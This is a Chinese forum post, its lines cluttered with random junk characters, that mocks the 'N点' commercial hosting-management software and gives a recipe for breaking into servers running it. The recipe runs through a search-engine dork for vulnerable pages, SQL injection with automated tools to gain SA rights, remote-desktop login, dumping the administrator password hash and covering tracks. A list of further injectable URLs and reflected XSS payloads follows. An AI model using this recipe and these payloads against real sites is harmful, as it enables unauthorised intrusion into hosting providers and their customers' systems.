不得不说N点实在是一个破东西. d2 L( E: A; Y4 j% }3 u* X
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
( l8 @5 t+ ~: J; q% p0 B/ N好吧 抱怨一下就行了 接下来关键的时候到了
5 V2 n! y! t' R- v: b7 K w$ D3 j首先百度搜索关键字:inurl: (mmdatabase.asp)% K/ Z! s0 _5 ?
我随便列举一个: www.xxxx.com
" Q: E& m! F" c9 ~% u+ ]( |6 j修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=17 X. D7 O5 p1 w; |* ?* O
扔入NBSI 或者啊D等各种傻逼工具后
1 p# Y9 z' V+ p) f6 e你们会看到是SA权限
- \7 R5 o/ I/ a8 g, J; g果断3389 上去 hash得到administrator密码! m2 O2 M) [' v7 F" e1 C2 T6 e
擦屁股走人~5 S3 Z. I/ X6 @- Q0 I3 g4 U& V
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的6 |0 j0 q# F8 @% f+ g5 Z0 ^+ m/ f
3 k0 T/ B( D0 @' f- V! \
再附上其他几个漏洞页面! { p6 z' I$ p; J/ @( v
SQL:
0 P( L1 |) T: Rhttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
2 T; N2 d w$ c9 {, g8 Lhttp://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
4 h! h! Q- I3 d% y; v4 w& W! ?http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
" C- ~! Y8 |0 o4 M' [/ Nhttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2+ z& _ {; j0 a; q/ f! j. c
XSS证明:
% `' A n9 `' [0 k n0 ehttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
9 C1 j% X" d x$ H: i7 Y% whttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”" M. [4 }+ U! w0 J' ]# V- G
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>! m1 }/ Z) B% Y
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜- z. s3 x5 P" f# K; e X
还是星外吧 你们懂的
7 R% J* b7 b" K1 B Y作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?# A7 l1 s2 o5 F5 z
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
2 }2 o- d0 w- S+ j% F1 ]——- |